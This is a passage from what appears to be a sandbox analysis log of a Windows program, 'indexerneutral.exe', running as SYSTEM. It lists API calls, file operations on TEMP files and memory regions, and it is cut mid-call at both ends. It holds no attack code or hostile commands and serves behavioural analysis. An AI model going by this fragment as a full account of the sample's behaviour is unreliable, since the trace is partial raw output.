hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.101] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.101] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.101] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.101] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.101] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.101] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.101] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.101] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.101] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.101] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.101] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.101] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.101] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.101] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.101] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.101] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.101] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.101] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.101] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0264.421] _strcmpi (_Str1="/nosort", _Str2="/scomma") returned -1 [0264.421] _strcmpi (_Str1="/nosort", _Str2="C:\\Windows\\TEMP\\3256.tmp") returned -1 [0264.421] qsort (in: _Base=0x0, _NumOfElements=0x0, _SizeOfElements=0x3a4, _PtFuncCompare=0x40a25d | out: _Base=0x0) [0264.421] SetCursor (hCursor=0x10007) returned 0x10007 [0264.421] CreateFileA (lpFileName="C:\\Windows\\TEMP\\3256.tmp" (normalized: "c:\\windows\\temp\\3256.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0264.421] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0264.421] SetCursor (hCursor=0x10007) returned 0x10007 [0264.421] CloseHandle (hObject=0x1bc) returned 1 [0264.421] SetCursor (hCursor=0x10007) returned 0x10007 [0264.422] DeleteObject (ho=0x30a01cb) returned 1 [0264.422] exit (_Code=0) Thread: id = 519 os_tid = 0x7f8 Thread: id = 523 os_tid = 0x46c Thread: id = 526 os_tid = 0x4c8 Thread: id = 535 os_tid = 0x75c Process: id = "27" image_name = "indexerneutral.exe" filename = "c:\\windows\\syswow64\\indexerneutral.exe" page_root = "0x1edd8000" os_pid = "0x7e8" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0x6cc" cmd_line = "\"C:\\Windows\\SysWOW64\\indexerneutral.exe\" \"C:\\Windows\\TEMP\\3267.tmp\"" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 3918 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3919 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3920 start_va = 0x40000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3921 start_va = 0x60000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3922 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3923 start_va = 0x1a0000 end_va = 0x1a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3924 start_va = 0x1b0000 end_va = 0x1b1fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 3925 start_va = 0x400000 end_va = 0x470fff entry_point = 0x400000 region_type = mapped_file name = "indexerneutral.exe" filename = "\\Windows\\SysWOW64\\indexerneutral.exe" (normalized: "c:\\windows\\syswow64\\indexerneutral.exe") Region: id = 3926 start_va = 0x77510000 end_va = 0x77688fff entry_point = 0x77510000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3927 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3928 start_va = 0x7ffdb000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 3929 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 3930 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 3931 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3932 start_va = 0x7fff0000 end_va = 0x7fff9f1bffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3933 start_va = 0x7fff9f1c0000 end_va = 0x7fff9f381fff entry_point = 0x7fff9f1c0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3934 start_va = 0x7fff9f382000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007fff9f382000" filename = "" Region: id = 3957 start_va = 0x370000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 3958 start_va = 0x72130000 end_va = 0x721a2fff entry_point = 0x72130000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3959 start_va = 0x721b0000 end_va = 0x721fefff entry_point = 0x721b0000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3960 start_va = 0x72200000 end_va = 0x72207fff entry_point = 0x72200000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3995 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3996 start_va = 0x20000 end_va = 0x23fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3997 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3998 start_va = 0x1c0000 end_va = 0x27dfff entry_point = 0x1c0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3999 start_va = 0x280000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 4000 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 4001 start_va = 0x530000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4002 start_va = 0x550000 end_va = 0x64ffff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 4003 start_va = 0x650000 end_va = 0x74ffff entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 4004 start_va = 0x750000 end_va = 0x8d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 4005 start_va = 0x8e0000 end_va = 0xa60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" Region: id = 4006 start_va = 0xa70000 end_va = 0xb2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a70000" filename = "" Region: id = 4007 start_va = 0x745b0000 end_va = 0x74608fff entry_point = 0x745b0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4008 start_va = 0x74610000 end_va = 0x74619fff entry_point = 0x74610000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4009 start_va = 0x74620000 end_va = 0x7463dfff entry_point = 0x74620000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4010 start_va = 0x74640000 end_va = 0x746ebfff entry_point = 0x74640000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4011 start_va = 0x74790000 end_va = 0x75b4efff entry_point = 0x74790000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 4012 start_va = 0x75ca0000 end_va = 0x75e59fff entry_point = 0x75ca0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4013 start_va = 0x75e60000 end_va = 0x75f1dfff entry_point = 0x75e60000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4014 start_va = 0x760a0000 end_va = 0x760e3fff entry_point = 0x760a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 4015 start_va = 0x760f0000 end_va = 0x7616afff entry_point = 0x760f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 4016 start_va = 0x76210000 end_va = 0x76252fff entry_point = 0x76210000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4017 start_va = 0x76320000 end_va = 0x76495fff entry_point = 0x76320000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4018 start_va = 0x765e0000 end_va = 0x765eefff entry_point = 0x765e0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 4019 start_va = 0x765f0000 end_va = 0x766dffff entry_point = 0x765f0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4020 start_va = 0x76aa0000 end_va = 0x76ae3fff entry_point = 0x76aa0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 4021 start_va = 0x76af0000 end_va = 0x76c3cfff entry_point = 0x76af0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4022 start_va = 0x76c40000 end_va = 0x76c4bfff entry_point = 0x76c40000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 4023 start_va = 0x76c50000 end_va = 0x7712cfff entry_point = 0x76c50000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 4024 start_va = 0x77310000 end_va = 0x7744ffff entry_point = 0x77310000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4025 start_va = 0x77450000 end_va = 0x774dcfff entry_point = 0x77450000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 4026 start_va = 0x7feb0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4027 start_va = 0x7ffd8000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 4028 start_va = 0x75b50000 end_va = 0x75c39fff entry_point = 0x75b50000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 4029 start_va = 0x2d0000 end_va = 0x360fff entry_point = 0x2d0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Thread: id = 515 os_tid = 0x7ec [0250.540] GetStartupInfoW (in: lpStartupInfo=0x19ff00 | out: lpStartupInfo=0x19ff00*(cb=0x44, lpReserved="", lpDesktop="", lpTitle="C:\\Windows\\SysWOW64\\indexerneutral.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0250.540] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x765f0000 [0250.540] GetProcAddress (hModule=0x765f0000, lpProcName="FlsAlloc") returned 0x7660a330 [0250.540] GetProcAddress (hModule=0x765f0000, lpProcName="FlsFree") returned 0x7660f400 [0250.540] GetProcAddress (hModule=0x765f0000, lpProcName="FlsGetValue") returned 0x76607580 [0250.540] GetProcAddress (hModule=0x765f0000, lpProcName="FlsSetValue") returned 0x76609910 [0250.540] GetProcAddress (hModule=0x765f0000, lpProcName="InitializeCriticalSectionEx") returned 0x76616030 [0250.540] GetProcAddress (hModule=0x765f0000, lpProcName="CreateEventExW") returned 0x76615f90 [0250.541] GetProcAddress (hModule=0x765f0000, lpProcName="CreateSemaphoreExW") returned 0x76615ff0 [0250.541] GetProcAddress (hModule=0x765f0000, lpProcName="SetThreadStackGuarantee") returned 0x7660a5d0 [0250.541] GetProcAddress (hModule=0x765f0000, lpProcName="CreateThreadpoolTimer") returned 0x7660a690 [0250.541] GetProcAddress (hModule=0x765f0000, lpProcName="SetThreadpoolTimer") returned 0x775440f0 [0250.541] GetProcAddress (hModule=0x765f0000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x7753d630 [0250.541] GetProcAddress (hModule=0x765f0000, lpProcName="CloseThreadpoolTimer") returned 0x7753ecf0 [0250.541] GetProcAddress (hModule=0x765f0000, lpProcName="CreateThreadpoolWait") returned 0x76615720 [0250.541] GetProcAddress (hModule=0x765f0000, lpProcName="SetThreadpoolWait") returned 0x7753e140 [0250.541] GetProcAddress (hModule=0x765f0000, lpProcName="CloseThreadpoolWait") returned 0x7753eb60 [0250.541] GetProcAddress (hModule=0x765f0000, lpProcName="FlushProcessWriteBuffers") returned 0x77579990 [0250.542] GetProcAddress (hModule=0x765f0000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77575540 [0250.542] GetProcAddress (hModule=0x765f0000, lpProcName="GetCurrentProcessorNumber") returned 0x77569dc0 [0250.542] GetProcAddress (hModule=0x765f0000, lpProcName="GetLogicalProcessorInformation") returned 0x7660a550 [0250.542] GetProcAddress (hModule=0x765f0000, lpProcName="CreateSymbolicLinkW") returned 0x76630a40 [0250.542] GetProcAddress (hModule=0x765f0000, lpProcName="SetDefaultDllDirectories") returned 0x76450790 [0250.542] GetProcAddress (hModule=0x765f0000, lpProcName="EnumSystemLocalesEx") returned 0x7660f8a0 [0250.542] GetProcAddress (hModule=0x765f0000, lpProcName="CompareStringEx") returned 0x7660fa30 [0250.542] GetProcAddress (hModule=0x765f0000, lpProcName="GetDateFormatEx") returned 0x76631030 [0250.542] GetProcAddress (hModule=0x765f0000, lpProcName="GetLocaleInfoEx") returned 0x7660a000 [0250.542] GetProcAddress (hModule=0x765f0000, lpProcName="GetTimeFormatEx") returned 0x766314b0 [0250.543] GetProcAddress (hModule=0x765f0000, lpProcName="GetUserDefaultLocaleName") returned 0x7660a4f0 [0250.543] GetProcAddress (hModule=0x765f0000, lpProcName="IsValidLocaleName") returned 0x766316f0 [0250.543] GetProcAddress (hModule=0x765f0000, lpProcName="LCMapStringEx") returned 0x76609970 [0250.543] GetProcAddress (hModule=0x765f0000, lpProcName="GetCurrentPackageId") returned 0x763d3c90 [0250.543] GetProcAddress (hModule=0x765f0000, lpProcName="GetTickCount64") returned 0x76608710 [0250.543] GetProcAddress (hModule=0x765f0000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0250.543] GetProcAddress (hModule=0x765f0000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0250.544] GetCurrentThreadId () returned 0x7ec [0250.544] GetStartupInfoW (in: lpStartupInfo=0x19fed0 | out: lpStartupInfo=0x19fed0*(cb=0x44, lpReserved="", lpDesktop="", lpTitle="C:\\Windows\\SysWOW64\\indexerneutral.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x406a8c, hStdOutput=0xfb38f1e2, hStdError=0x4063f6)) [0250.544] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0250.544] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0250.544] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0250.544] GetCommandLineA () returned="\"C:\\Windows\\SysWOW64\\indexerneutral.exe\" \"C:\\Windows\\TEMP\\3267.tmp\"" [0250.544] GetEnvironmentStringsW () returned 0x560600* [0250.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1355, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1355 [0250.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1355, lpMultiByteStr=0x5610a0, cbMultiByte=1355, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1355 [0250.544] FreeEnvironmentStringsW (penv=0x560600) returned 1 [0250.544] GetLastError () returned 0x7f [0250.544] SetLastError (dwErrCode=0x7f) [0250.544] GetLastError () returned 0x7f [0250.544] SetLastError (dwErrCode=0x7f) [0250.544] GetLastError () returned 0x7f [0250.544] SetLastError (dwErrCode=0x7f) [0250.544] GetACP () returned 0x4e4 [0250.544] GetLastError () returned 0x7f [0250.544] SetLastError (dwErrCode=0x7f) [0250.544] IsValidCodePage (CodePage=0x4e4) returned 1 [0250.544] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fed4 | out: lpCPInfo=0x19fed4) returned 1 [0250.544] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f99c | out: lpCPInfo=0x19f99c) returned 1 [0250.544] GetLastError () returned 0x7f [0250.545] SetLastError (dwErrCode=0x7f) [0250.545] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fdb0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0250.545] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fdb0, cbMultiByte=256, lpWideCharStr=0x19f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0250.545] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpCharType=0x19f9b0 | out: lpCharType=0x19f9b0) returned 1 [0250.545] GetLastError () returned 0x7f [0250.545] SetLastError (dwErrCode=0x7f) [0250.545] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fdb0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0250.545] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fdb0, cbMultiByte=256, lpWideCharStr=0x19f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0250.545] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0250.545] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x19f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0250.545] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x19fcb0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 